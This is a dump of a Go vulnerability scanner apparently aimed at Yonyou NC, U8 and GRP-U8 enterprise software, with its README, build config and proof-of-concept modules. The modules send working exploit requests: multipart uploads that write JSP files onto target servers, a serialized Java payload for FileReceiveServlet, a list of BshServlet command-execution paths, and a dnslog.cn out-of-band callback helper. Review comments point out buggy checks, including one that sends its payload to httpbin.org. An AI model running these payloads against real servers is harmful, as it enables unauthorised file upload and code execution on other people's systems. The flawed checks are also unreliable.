github.com/hashicorp/go-multierror v1.1.1 // indirect 18 | github.com/klauspost/compress v1.16.7 // indirect 19 | github.com/onsi/ginkgo/v2 v2.12.0 // indirect 20 | github.com/quic-go/qpack v0.4.0 // indirect 21 | github.com/quic-go/qtls-go1-20 v0.4.1 // indirect 22 | github.com/quic-go/quic-go v0.40.0 // indirect 23 | github.com/refraction-networking/utls v1.5.4 // indirect 24 | github.com/xo/terminfo v0.0.0-20210125001918-ca9a967f8778 // indirect 25 | go.uber.org/mock v0.3.0 // indirect 26 | golang.org/x/crypto v0.12.0 // indirect 27 | golang.org/x/exp v0.0.0-20230817173708-d852ddb80c63 // indirect 28 | golang.org/x/mod v0.12.0 // indirect 29 | golang.org/x/net v0.14.0 // indirect 30 | golang.org/x/sys v0.12.0 // indirect 31 | golang.org/x/text v0.13.0 // indirect 32 
| golang.org/x/tools v0.12.1-0.20230815132531-74c255bcf846 // indirect 33 | ) 34 | -------------------------------------------------------------------------------- /pkg/POC/accept-upload/accept-upload.go: -------------------------------------------------------------------------------- 1 | package accept_upload 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/aim/equipmap/accept.jsp" 16 | data := "-----------------------------16314487820932200903769468567\nContent-Disposition: form-data; name=\"upload\"; filename=\"2XOSxplUo2EnwilSNJazJYZxZUc.txt\"\nContent-Type: text/plain\n\n<% out.println(\"2XOSxnJbIM7VyX60FJvryCft1X5\"); %>\n-----------------------------16314487820932200903769468567\nContent-Disposition: form-data; name=\"fname\"\n\n\\webapps\\nc_web\\2XOSxnFIgjeaGE7MQmmZiv3Imfw.jsp\n-----------------------------16314487820932200903769468567--" 17 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 18 | "User-Agent": UA, 19 | "Content-Type": "multipart/form-data; boundary=---------------------------16314487820932200903769468567", 20 | }).SetBody(data).Post(url) 21 | if err != nil { 22 | color.Red.Println("[-] 用友 accept 任意文件上传漏洞不存在") 23 | return 24 | } 25 | if resp.Status == "200 OK" { 26 | color.Green.Println("[+] 用友 accept 任意文件上传漏洞存在 -> " + url) 27 | return 28 | } 29 | color.Red.Println("[-] 用友 accept 任意文件上传漏洞不存在") 30 | } 31 | -------------------------------------------------------------------------------- /.github/conf/.goreleaser.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | builds: 5 | - 6 | id: default 7 | 
env: 8 | - CGO_ENABLED=0 9 | goos: 10 | - windows 11 | - linux 12 | - darwin 13 | - freebsd 14 | - solaris 15 | goarch: 16 | - amd64 17 | - "386" 18 | - arm 19 | - arm64 20 | - mips 21 | - mipsle 22 | - mips64 23 | goarm: 24 | - "6" 25 | - "7" 26 | flags: 27 | - -trimpath 28 | ldflags: 29 | - -s -w 30 | upx: 31 | - 32 | ids: [ default ] 33 | enabled: true 34 | goos: ["windows", "linux"] 35 | goarch: ["amd64", "386"] 36 | compress: best 37 | # lzma: true 38 | # brute: true 39 | archives: 40 | - 41 | format: binary 42 | allow_different_binary_count: true 43 | name_template: >- 44 | {{- .ProjectName }} 45 | {{- if eq .Os "darwin"}}_mac 46 | {{- else if eq .Os "linux"}} 47 | {{- else if eq .Os "windows"}} 48 | {{- else }}_{{ .Os }}{{ end }} 49 | {{- if eq .Arch "amd64" }} 50 | {{- else if eq .Arch "386" }}32 51 | {{- else }}_{{ .Arch }}{{ end }} 52 | {{- if .Arm }}v{{ .Arm }}{{ end -}} 53 | checksum: 54 | name_template: 'checksums.txt' 55 | snapshot: 56 | name_template: "{{ incpatch .Version }}-next" 57 | changelog: 58 | sort: asc 59 | filters: 60 | exclude: 61 | - '^docs:' 62 | - '^test:' 63 | - "^*.md" 64 | - "^*.ya?ml" 65 | -------------------------------------------------------------------------------- /pkg/POC/GRP-U8-U8AppProxy/GRP-U8-U8AppProxy.go: -------------------------------------------------------------------------------- 1 | package GRP_U8_U8AppProxy 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "strings" 7 | "time" 8 | ) 9 | 10 | var ( 11 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 12 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 13 | ) 14 | 15 | func Run(url string) { 16 | url1 := url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../yongyouU8_test" 17 | data := "--59229605f98b8cf290a7b8908b34616b\nContent-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\nContent-Type: image/png\n \n<% 
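out.println(\"yongyouu8\");%>\n--59229605f98b8cf290a7b8908b34616b--"
18 | _, err := client.R().
19 | SetHeaders(map[string]string{ // Set multiple headers at once
20 | "User-Agent": UA,
21 | "Content-Type": "multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b",
22 | }).SetBody(data).Post(url1)
23 | if err != nil {
24 | color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
25 | return
26 | }
// Verification: fetch the file the upload was aimed at and look for its marker.
27 | resp1, err1 := client.R().
28 | SetHeaders(map[string]string{ // Set multiple headers at once
29 | "User-Agent": UA,
30 | }).Get(url + "/yongyouU8_test.jsp")
31 | if err1 != nil {
32 | color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
33 | return
34 | }
35 | if strings.Contains(resp1.String(), "yongyouu8") {
36 | color.Green.Println("[+] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞存在")
37 | return
38 | }
39 | color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
40 | }
41 |
-------------------------------------------------------------------------------- /pkg/dnslog/dnslog.go: --------------------------------------------------------------------------------
1 | package dnslog
2 |
3 | import (
4 | "fmt"
5 | "github.com/imroc/req/v3"
6 | "math/rand"
7 | "time"
8 | )
9 |
10 | // client and UA are shared by both dnslog.cn calls below. Both endpoints are
11 | // plain http:// URLs on a third-party service, so the session value and the
12 | // callback domain travel unencrypted. The timeout is new: the previous client
13 | // had none, and a stalled request here would hold up wg.Wait in
14 | // config.YonYouScanRun for the whole scan.
15 | var (
16 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(10 * time.Second)
17 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
18 | )
19 |
20 | // randCreator returns a 26-character string drawn from a lowercase alphanumeric
21 | // alphabet. It is used only as the PHPSESSID cookie value that ties the two
22 | // dnslog.cn requests together, so math/rand is adequate; it is not a secret.
23 | // (The alphabet repeats 'g' and lacks 'j'; kept byte-for-byte because it only
24 | // skews the distribution of an opaque identifier.)
25 | func randCreator() string {
26 | const alphabet = "0123456789abcdefghigklmnopqrstuvwxyz"
27 | r := rand.New(rand.NewSource(time.Now().UnixNano()))
28 | out := make([]byte, 26)
29 | for i := range out {
30 | out[i] = alphabet[r.Intn(len(alphabet))]
31 | }
32 | return string(out)
33 | }
34 |
35 | // GetDnslogUrl asks dnslog.cn for a fresh callback domain and returns it with
36 | // the PHPSESSID value that identifies the session; pass the same session to
37 | // GetDnslogRecord to read back hits. On a transport error it prints a notice
38 | // and returns two empty strings. Callers must check for an empty domain before
39 | // embedding it in a payload — the two callers visible in this repo
40 | // (UploadServlet-Deser, MessageServlet-Deser) do not, and then send a payload
41 | // with no usable callback.
42 | func GetDnslogUrl() (string, string) {
43 | session := randCreator()
44 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
45 | "User-Agent": UA,
46 | "Cookie": "PHPSESSID=" + session,
47 | }).Get("http://www.dnslog.cn/getdomain.php")
48 | if err != nil {
49 | // The old code only bailed out when resp was nil; an error with a non-nil
50 | // resp fell through and returned the error body as the "domain".
51 | fmt.Println("与dns平台网络不可达,请检查网络")
52 | return "", ""
53 | }
54 | // The body is used verbatim as the domain; a non-200 answer may yield whatever
55 | // text dnslog.cn returned, which an empty-domain check in the caller does not catch.
56 | return resp.String(), session
57 | }
58 |
59 | // GetDnslogRecord waits three seconds and reports whether dnslog.cn has logged a
60 | // lookup for the session's domain. The fixed sleep is the only synchronisation
61 | // with the target, so a slower callback is reported as false (a false negative);
62 | // transport errors are also reported as false after printing a notice.
63 | // NOTE(review): any body other than "[]" counts as a hit, so an error page from
64 | // dnslog.cn would read as a positive — not verified here.
65 | func GetDnslogRecord(PHPSESSID string) bool {
66 | time.Sleep(3 * time.Second)
67 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
68 | "User-Agent": UA,
69 | "Cookie": "PHPSESSID=" + PHPSESSID,
70 | }).Get("http://www.dnslog.cn/getrecords.php")
71 | if err != nil {
72 | fmt.Println("与dns平台网络不可达,请检查网络")
73 | return false
74 | }
75 | return resp.String() != "[]"
76 | }
77 |
-------------------------------------------------------------------------------- /pkg/POC/GRP-U8-UploadFileData/GRP-U8-UploadFileData.go: --------------------------------------------------------------------------------
1 | package GRP_U8_UploadFileData
2 |
3 | import (
4 | "github.com/gookit/color"
5 | "github.com/imroc/req/v3"
6 | "strings"
7 | "time"
8 | )
9 |
10 | var (
11 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
12 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
13 | )
14 |
15 | func Run(url string) {
16 | url1 := url + "/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=..%2F&filename=94156577.jsp&filename=1.jpg"
17 | data := "--ec126a48c5b7676dce1b676f5251358f\nContent-Disposition: form-data; \n\n<% out.println(\"3135168535\");%>\n--ec126a48c5b7676dce1b676f5251358f--"
18 | _, err := client.R().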
19 | SetHeaders(map[string]string{ // Set multiple headers at once
20 | "User-Agent": UA,
21 | "Content-Type": "multipart/form-data; boundary=ec126a48c5b7676dce1b676f5251358f",
22 | }).SetBody(data).Post(url1)
23 | if err != nil {
// NOTE(review): copy-paste label — this file is the UploadFileData check, but the
// message names U8AppProxy, so a network failure here is misattributed in batch output.
24 | color.Red.Println("[-] 用友 GRP-U8 U8AppProxy 任意文件上传漏洞不存在")
25 | return
26 | }
// Verification: fetch the path the upload was aimed at and look for a marker.
27 | resp1, err1 := client.R().
28 | SetHeaders(map[string]string{ // Set multiple headers at once
29 | "User-Agent": UA,
30 | }).Get(url + "/R9iPortal/94156577.jsp")
31 | if err1 != nil {
32 | color.Red.Println("[-] 用友 GRP-U8 UploadFileData 任意文件上传漏洞不存在")
33 | return
34 | }
// NOTE(review): the marker searched for here ("yongyouu8", the U8AppProxy check's
// marker) is not what the body on line 17 prints ("3135168535"), so this verdict is
// unreliable (false negative). The upload request is sent regardless; from the
// target's side the indicators are a POST to /UploadFileData?action=upload_file
// followed by a GET of /R9iPortal/94156577.jsp, and that file existing on disk.
35 | if strings.Contains(resp1.String(), "yongyouu8") {
36 | color.Green.Println("[+] 用友 GRP-U8 UploadFileData 任意文件上传漏洞存在")
37 | return
38 | }
39 | color.Red.Println("[-] 用友 GRP-U8 UploadFileData 任意文件上传漏洞不存在")
40 | }
41 |
-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
1 | # yongyouScan
2 |
3 | # 单个检测
4 | ```go
5 | yongyouScan.exe -u "http://127.0.0.1"
6 | ```
7 |
8 | # 批量检测
9 | ```go
10 | yongyouScan.exe -f "C:\targets.txt"
11 | ```
12 |
13 | # 🐳POC
14 |
15 |
16 | POC共有41个 17 |

18 | 用友 NC MessageServlet反序列化漏洞
19 | 用友 NC UploadServlet反序列化漏洞
20 | 用友 NC 6.5 未授权文件上传漏洞
21 | 用友 NC MonitorServlet反序列化漏洞
22 | 用友 GRP-U8 Proxy SQL注入漏洞
23 | 用友 NC 配置文件泄露漏洞
24 | 用友 NCCloud FS 文件管理 SQL 注入
25 | 用友 ERP-NC 目录遍历漏洞
26 | 用友 NC IUpdateService XXE漏洞
27 | 用友 Uapjs JNDI注入漏洞
28 | 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
29 | 用友 U8 OA test.jsp SQL注入漏洞
30 | 用友 accept 任意文件上传漏洞
31 | 畅捷通T+ DownloadProxy任意文件读取漏洞
32 | 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞
33 | 用友 U8 RegisterServlet反序列化漏洞
34 | 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
35 | 用友 文件服务器 认证绕过漏洞
36 | 用友 uapws 认证绕过漏洞
37 | 用友 U8 CacheInvokeServlet反序列化漏洞
38 | 用友 U8 TableInputOperServlet反序列化漏洞
39 | 用友 files 反序列化漏洞
40 | 用友 U8 ActionHandlerServlet反序列化漏洞
41 | 用友 U8 MxServlet反序列化漏洞
42 | 用友 U8 ServletCommander反序列化漏洞
43 | 用友 GRP-U8 UploadFileData 任意文件上传漏洞
44 | 用友 U8 MonitorServlet反序列化漏洞
45 | 用友 uapws 认证绕过漏洞
46 | 用友 U8 LoginServlet反序列化漏洞
47 | 用友 U8 FileTransportServlet反序列化漏洞
48 | 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞
49 | 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
50 | 用友时空 KSOA 多处SQL注入漏洞
51 | 用友 U8 TaskTreeQuery SQL注入漏洞
52 | 用友 文件服务器 认证绕过漏洞
53 | 用友NC XbrlPersistenceServlet反序列化漏洞
54 | 用友 U8 ClientRequestDispatch反序列化漏洞
55 | 用友 FileReceiveServlet反序列化漏洞
56 | 用友 NC JiuQiClientReqDispatch反序列化漏洞
57 | 用友 GRP-U8 U8AppProxy 任意文件上传漏洞
58 | 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
59 | 
60 |
61 |
62 | # 👮免责声明
63 |
64 | 该工具仅用于安全自查检测
65 |
66 | 由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
67 |
68 | 本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。
69 |
-------------------------------------------------------------------------------- /pkg/POC/NC6.5-UploadFile/yonyou-NC6.5-UploadFile.go: --------------------------------------------------------------------------------
1 | package NC6_5_UploadFile
2 |
3 | import (
4 | "github.com/gookit/color"
5 | "github.com/imroc/req/v3"
6 | "strings"
7 | )
8 |
// Shared client; unlike the other checks in this repo it sets no timeout.
9 | var (
10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().EnableDumpAllWithoutResponse()
11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 |
// Run is the "Yonyou NC 6.5 unauthenticated file upload" check. As written it
// never delivers its payload to the target: the serialized data built below is
// POSTed to https://httpbin.org/post (a third-party echo service), so the only
// request that reaches url is the GET on line 30. See the notes on the lines
// below; the verdict this function prints should not be relied on.
14 | func Run(url string) {
15 | url = url + "/servlet/FileReceiveServlet"
// uploadData appears to be a Java-serialized java.util.HashMap — the bytes spell
// out FILE_NAME=t00ls.jsp and TARGET_FILE_PATH=./webapps/nc_web — with shellFlag
// appended after the end-of-block byte.
16 | uploadData := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
17 | shellFlag := "t0test0ls"
18 | uploadData += shellFlag
19 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
20 | "User-Agent": UA,
21 | "Referer": "https://google.com",
22 | }).SetHeaders(map[string]string{ // Set multiple headers at once
23 | "data": uploadData,
// NOTE(review): the payload (as a "data" header) is sent to httpbin.org, not to
// url. That discloses the scan's payload to a third party, and httpbin answers
// 200 to any POST, so the status check on line 29 is true regardless of the
// target.
24 | }).Post("https://httpbin.org/post")
25 | if err != nil {
26 | color.Red.Println("[-] 用友 NC 6.5 未授权文件上传漏洞不存在")
27 | return
28 | }
29 | if resp.Status == "200 OK" {
// NOTE(review): url already ends in "/servlet/FileReceiveServlet" (line 15), so
// this requests ".../servlet/FileReceiveServletu+/t00ls.jsp". req.MustGet panics on
// any transport error, and Run executes in a goroutine under config.YonYouScanRun
// with no recover, so an unreachable host here terminates the whole scan instead
// of reporting a negative.
30 | resp1 := req.MustGet(url + "u+/t00ls.jsp")
31 | if
strings.Contains(resp1.String(), shellFlag) {
// NOTE(review): this "present" verdict is printed in Red with a "[-]" prefix; the
// other checks visible in this repo use Green and "[+]" for a positive, so output
// parsing by prefix will misclassify this one.
32 | color.Red.Println("[-] 用友 NC 6.5 未授权文件上传漏洞存在,访问 -> " + url + "u+/t00ls.jsp")
33 | return
34 | }
35 | }
36 | color.Red.Println("[-] 用友 NC 6.5 未授权文件上传漏洞不存在")
37 | }
38 |
-------------------------------------------------------------------------------- /pkg/qi/qi.go: --------------------------------------------------------------------------------
1 | package qi
2 |
3 | import (
4 | "bufio"
5 | "fmt"
6 | "github.com/gookit/color"
7 | "os"
8 | "strings"
9 | )
10 |
// Three six-step 256-colour palettes used by gradient; gradient assumes at least
// six entries (see the note there).
11 | var (
12 | green = []*color.Style256{color.S256(46), color.S256(47), color.S256(48), color.S256(49), color.S256(50), color.S256(51)}
13 | pink = []*color.Style256{color.S256(214), color.S256(215), color.S256(216), color.S256(217), color.S256(218), color.S256(219)}
14 | yellow = []*color.Style256{color.S256(226), color.S256(227), color.S256(228), color.S256(229), color.S256(230), color.S256(231)}
15 | )
16 |
// ReadLinesFromFile returns every line of filename as-is (no trimming, blank
// lines included), used for the batch target list. Errors from Open and from the
// scanner are wrapped with a Chinese prefix via %v, so callers cannot errors.Is
// them. bufio.Scanner's default 64 KiB line limit applies and surfaces through
// scanner.Err.
17 | func ReadLinesFromFile(filename string) ([]string, error) {
18 | file, err := os.Open(filename)
19 | if err != nil {
20 | return nil, fmt.Errorf("打开文件错误: %v", err)
21 | }
22 | defer file.Close()
23 | scanner := bufio.NewScanner(file)
24 | lines := []string{}
25 | for scanner.Scan() {
26 | line := scanner.Text()
27 | lines = append(lines, line)
28 | }
29 | if err := scanner.Err(); err != nil {
30 | return nil, fmt.Errorf("文件读取错误: %v", err)
31 | }
32 | return lines, nil
33 | }
34 |
// gradient colours text character by character, advancing to the next style in
// coloRR every t+1 characters, where t is one sixth of the BYTE length of text.
// Characters are split per rune, so for multibyte text (the █ banner) fewer than
// six steps are used; index i never exceeds 5 because at most len(text) runes are
// visited, so coloRR needs at least six entries (all three palettes have six).
// Newlines are re-inserted per line and the trailing one trimmed.
35 | func gradient(text string, coloRR []*color.Style256) string {
36 | lines := strings.Split(text, "\n")
37 |
38 | var output string
39 |
40 | t := len(text) / 6
41 | i := 0
42 | j := 0
43 | for l := 0; l < len(lines); l++ {
44 | str := strings.Split(lines[l], "")
45 | for _, x := range str {
46 | j++
47 | output += coloRR[i].Sprint(x)
48 | if j > t {
49 | i++
50 | j = 0
51 | }
52 | }
// Always true inside the loop (Split never returns an empty slice); kept as-is.
53 | if len(lines) != 0 {
54 | output += "\n"
55 | }
56 | }
57 |
58 | return strings.TrimRight(output, "\n")
59 | }
60 |
// Logo prints the ASCII banner and author line through gradient with the yellow palette.
61 | func Logo() {
62 | logo1 := " \n \n██\\ ██\\ ██████\\ ███████\\ 
██████\\ \n██ | ██ |██ __██\\ ██ __██\\ ██ __██\\ \n██ | ██ |██ / ██ |██ | ██ |██ / ██ |\n██ | ██ |██ | ██ |██ | ██ |██ | ██ |\n\\███████ |\\██████ |██ | ██ |\\███████ |\n \\____██ | \\______/ \\__| \\__| \\____██ |\n██\\ ██ | ██\\ ██ |\n\\██████ | \\██████ |\n \\______/ \\______/ " 63 | fmt.Println(gradient(logo1, yellow)) 64 | fmt.Println(gradient("by qi4l", yellow)) 65 | } 66 | -------------------------------------------------------------------------------- /pkg/POC/NC-BshServlet/payload.txt: -------------------------------------------------------------------------------- 1 | /service/~aim/bsh.servlet.BshServlet 2 | /service/~alm/bsh.servlet.BshServlet 3 | /service/~ampub/bsh.servlet.BshServlet 4 | /service/~arap/bsh.servlet.BshServlet 5 | /service/~aum/bsh.servlet.BshServlet 6 | /service/~cc/bsh.servlet.BshServlet 7 | /service/~cdm/bsh.servlet.BshServlet 8 | /service/~cmp/bsh.servlet.BshServlet 9 | /service/~ct/bsh.servlet.BshServlet 10 | /service/~dm/bsh.servlet.BshServlet 11 | /service/~erm/bsh.servlet.BshServlet 12 | /service/~fa/bsh.servlet.BshServlet 13 | /service/~fac/bsh.servlet.BshServlet 14 | /service/~fbm/bsh.servlet.BshServlet 15 | /service/~ff/bsh.servlet.BshServlet 16 | /service/~fip/bsh.servlet.BshServlet 17 | /service/~fipub/bsh.servlet.BshServlet 18 | /service/~fp/bsh.servlet.BshServlet 19 | /service/~fts/bsh.servlet.BshServlet 20 | /service/~fvm/bsh.servlet.BshServlet 21 | /service/~gl/bsh.servlet.BshServlet 22 | /service/~hrhi/bsh.servlet.BshServlet 23 | /service/~hrjf/bsh.servlet.BshServlet 24 | /service/~hrpd/bsh.servlet.BshServlet 25 | /service/~hrpub/bsh.servlet.BshServlet 26 | /service/~hrtrn/bsh.servlet.BshServlet 27 | /service/~hrwa/bsh.servlet.BshServlet 28 | /service/~ia/bsh.servlet.BshServlet 29 | /service/~ic/bsh.servlet.BshServlet 30 | /service/~iufo/bsh.servlet.BshServlet 31 | /service/~modules/bsh.servlet.BshServlet 32 | /service/~mpp/bsh.servlet.BshServlet 33 | /service/~obm/bsh.servlet.BshServlet 34 | 
/service/~pu/bsh.servlet.BshServlet 35 | /service/~qc/bsh.servlet.BshServlet 36 | /service/~sc/bsh.servlet.BshServlet 37 | /service/~scmpub/bsh.servlet.BshServlet 38 | /service/~so/bsh.servlet.BshServlet 39 | /service/~so2/bsh.servlet.BshServlet 40 | /service/~so3/bsh.servlet.BshServlet 41 | /service/~so4/bsh.servlet.BshServlet 42 | /service/~so5/bsh.servlet.BshServlet 43 | /service/~so6/bsh.servlet.BshServlet 44 | /service/~tam/bsh.servlet.BshServlet 45 | /service/~tbb/bsh.servlet.BshServlet 46 | /service/~to/bsh.servlet.BshServlet 47 | /service/~uap/bsh.servlet.BshServlet 48 | /service/~uapbd/bsh.servlet.BshServlet 49 | /service/~uapde/bsh.servlet.BshServlet 50 | /service/~uapeai/bsh.servlet.BshServlet 51 | /service/~uapother/bsh.servlet.BshServlet 52 | /service/~uapqe/bsh.servlet.BshServlet 53 | /service/~uapweb/bsh.servlet.BshServlet 54 | /service/~uapws/bsh.servlet.BshServlet 55 | /service/~vrm/bsh.servlet.BshServlet 56 | /service/~yer/bsh.servlet.BshServlet -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.0.5 h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs= 2 | github.com/andybalholm/brotli v1.0.5/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 3 | github.com/cloudflare/circl v1.3.3 h1:fE/Qz0QdIGqeWfnwq0RE0R7MI51s0M2E4Ga9kq5AEMs= 4 | github.com/cloudflare/circl v1.3.3/go.mod h1:5XYMA4rFBvNIrhs50XuiBJ15vF2pZn4nnUKZrLbUZFA= 5 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 6 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 7 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 8 | github.com/gaukas/godicttls v0.0.4 h1:NlRaXb3J6hAnTmWdsEKb9bcSBD6BvcIjdGdeb0zfXbk= 9 | github.com/gaukas/godicttls v0.0.4/go.mod h1:l6EenT4TLWgTdwslVb4sEMOCf7Bv0JAK67deKr9/NCI= 10 | github.com/go-logr/logr 
v1.2.4 h1:g01GSCwiDw2xSZfjJ2/T9M+S6pFdcNtFYsp+Y43HYDQ= 11 | github.com/go-logr/logr v1.2.4/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= 12 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 h1:tfuBGBXKqDEevZMzYi5KSi8KkcZtzBcTgAUUtapy0OI= 13 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572/go.mod h1:9Pwr4B2jHnOSGXyyzV8ROjYa2ojvAY6HCGYYfMoC3Ls= 14 | github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg= 15 | github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= 16 | github.com/google/go-cmp v0.5.9 h1:O2Tfq5qg4qc4AmwVlvv0oLiVAGB7enBSJ2x2DqQFi38= 17 | github.com/google/go-cmp v0.5.9/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= 18 | github.com/google/pprof v0.0.0-20230901174712-0191c66da455 h1:YhRUmI1ttDC4sxKY2V62BTI8hCXnyZBV9h38eAanInE= 19 | github.com/google/pprof v0.0.0-20230901174712-0191c66da455/go.mod h1:czg5+yv1E0ZGTi6S6vVK1mke0fV+FaUhNGcd6VRS9Ik= 20 | github.com/gookit/color v1.5.4 h1:FZmqs7XOyGgCAxmWyPslpiok1k05wmY3SJTytgvYFs0= 21 | github.com/gookit/color v1.5.4/go.mod h1:pZJOeOS8DM43rXbp4AZo1n9zCU2qjpcRko0b6/QJi9w= 22 | github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= 23 | github.com/hashicorp/errwrap v1.1.0 h1:OxrOeh75EUXMY8TBjag2fzXGZ40LB6IKw45YeGUDY2I= 24 | github.com/hashicorp/errwrap v1.1.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= 25 | github.com/hashicorp/go-multierror v1.1.1 h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo= 26 | github.com/hashicorp/go-multierror v1.1.1/go.mod h1:iw975J/qwKPdAO1clOe2L8331t/9/fmwbPZ6JB6eMoM= 27 | github.com/imroc/req/v3 v3.42.2 h1:/BwrKXGR7X1/ptccaQAiziDCeZ7T6ye55g3ZhiLy1fc= 28 | github.com/imroc/req/v3 v3.42.2/go.mod h1:W7dOrfQORA9nFoj+CafIZ6P5iyk+rWdbp2sffOAvABU= 29 | github.com/klauspost/compress v1.16.7 h1:2mk3MPGNzKyxErAw8YaohYh69+pa4sIQSC0fPGCFR9I= 30 | github.com/klauspost/compress v1.16.7/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= 31 
